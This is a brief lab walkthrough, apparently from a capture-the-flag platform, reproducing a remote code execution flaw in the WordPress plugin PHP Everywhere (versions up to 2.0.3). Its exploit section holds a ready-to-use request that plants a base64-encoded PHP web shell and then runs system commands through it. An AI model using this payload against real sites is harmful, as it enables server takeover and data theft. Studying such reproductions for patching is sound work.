产品简介#
WordPress は個人ブログシステムであり、徐々にコンテンツ管理システムソフトウェアに進化してきました。PHP 言語と MySQL データベースを使用して開発されており、ユーザーは PHP と MySQL データベースをサポートするサーバー上で独自のブログを使用することができます。
漏洞概要#
この脆弱性を利用すると、任意の PHP コードをサイト上で実行できるように、"ショートコード" パラメータを PHP Everywhere に設定したリクエストを送信することができます。
影響範囲#
<= 2.0.3
影響プラグイン:PHP Everywhere
悪用手順#
バックエンドアドレスにアクセスします:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
アカウント:test/test
ダッシュボードの下部のコンテンツを削除し、ブラウザの F12 を押してノードを追加し、次の内容を入力します:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
その後、実行してください(execute をクリック)。次のリンクにアクセスします:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
ページが 200 を返します。
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
修正案#
- バージョンをアップグレードする